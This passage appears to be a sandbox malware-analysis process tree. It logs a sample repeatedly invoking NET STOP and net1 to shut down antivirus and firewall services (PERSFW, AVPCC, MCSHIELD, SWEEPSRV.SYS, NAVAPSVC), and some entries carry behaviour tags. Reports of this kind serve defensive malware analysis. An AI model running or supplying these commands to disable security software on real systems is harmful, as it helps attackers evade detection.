C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:5860
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:3908
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5788
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5308
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:5416
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:3896
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:5824
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:4616
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:4380
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:4772
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:5532
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:5724
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5592
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:4556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:4484
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5896
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:1452
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:5668
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:4380
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:3000
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:1248
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:5816
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5572
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:6000
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
- System Location Discovery: System Language Discovery
PID:3892
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5844
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:5796
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:2296
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:3640
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:4296
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:3048
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:5780
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:3612
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:3904
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:5528
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:6124
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:5520
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:5492
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:2112
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:5296
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:2400
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:5720
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5548
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:1948
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:5432
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5880
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:624
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:3592
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:5992
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:5568
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:3344
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:6028
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:4216
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5852
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:5464
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5620
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:6124
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:5888
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:3932
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:1264
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:3996
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:5400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5548
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:4764
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:4640
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:4400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:6004
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:5468
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:4348
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:4892
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:4304
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:5900
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:4632
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5884
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:2620
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:6000
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:3592
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:4156
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
- System Location Discovery: System Language Discovery
PID:5548
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:6024
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:5432
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:4556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5560
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5772
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:5812
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:536
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:4272
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:5900
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:4048
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:5128
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:3004
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:5540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:3452
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5616
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:1836
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5876
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:3200
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:1640
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:4216
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:1904
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:1724
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:2372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5520
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5984
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:6000
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5444
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:5992
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:6000
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:6020
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:4772
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:1148
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:4296
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5164
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5320
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:2008
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:1580
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:5312
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:5056
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
- System Location Discovery: System Language Discovery
PID:1448
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:1876
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:2224
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:5572
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5404
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:3200
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
- System Location Discovery: System Language Discovery
PID:2556
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5340
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:1184
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:384
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:5108
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:2564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:6108
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:4580
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:6068
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:500
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:3416
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5652
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:4668
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:4248
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:5056
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
- System Location Discovery: System Language Discovery
PID:3596 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:5420
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:5772
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5376
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:3808
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
- System Location Discovery: System Language Discovery
PID:3480 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:5816
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
- System Location Discovery: System Language Discovery
PID:4892 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:5456
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:5220
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:5516
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:240
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:2232
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5320
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:5900
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
- System Location Discovery: System Language Discovery
PID:1492
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:1184
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:4916
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:1068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:3596
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:5692
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5404
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5876
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:5928
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5904
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:2556
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:2924
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
- System Location Discovery: System Language Discovery
PID:3664
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:3452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:5376
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:3444
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5204
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
- System Location Discovery: System Language Discovery
PID:1240 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:6136
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5796
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:5208
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:3364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:4296
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:1540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:5240
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:4940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:1148
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:1028
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:6076
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:4292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:5712
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:5460
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:3896
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:5376
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:5780
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:6136
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:1640
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:908
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:3344
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:1768
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:4372
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:3048
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:1596
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
- System Location Discovery: System Language Discovery
PID:3868 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:6080
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:3104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5440
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:3896
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:5812
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:3176
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:2324
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
- System Location Discovery: System Language Discovery
PID:4496 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:2620
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:3360
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:5304
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:2672
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:5928
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:2200
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:5876
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:3892
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:1636
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:6040
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:4564
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:1440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:3360
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
- System Location Discovery: System Language Discovery
PID:2316 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:1080
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5196
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:2564
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5340
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:5228
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:5932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:5204
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:4340
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
- System Location Discovery: System Language Discovery
PID:2108
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:4844
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:2136
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5708
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:4556
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:6024
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:4372
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:4160
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:5100
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:4360
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:4772
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:1332
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵
- System Location Discovery: System Language Discovery
PID:2924
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:2456
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:4440
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:772
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:4732
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:3932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:5212
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:5520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:2924
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:4672
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:1920
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:4388
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:1480
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:3984
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:5740
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:3780
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:4024
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:5932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:3892
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:5672
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:2896
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:2564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:2416
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
- System Location Discovery: System Language Discovery
PID:5628 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:3992
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:4300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
- System Location Discovery: System Language Discovery
PID:3456
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:5540
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
- System Location Discovery: System Language Discovery
PID:3996
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:3468
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:1636
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:1840
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:3720
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:4340
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:1444
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:3476
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵PID:3836
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵PID:1332
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵PID:1724
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵PID:1080
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵PID:3448
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵PID:5792
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵PID:4324
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵PID:5740
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵PID:1020
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵PID:6108
-
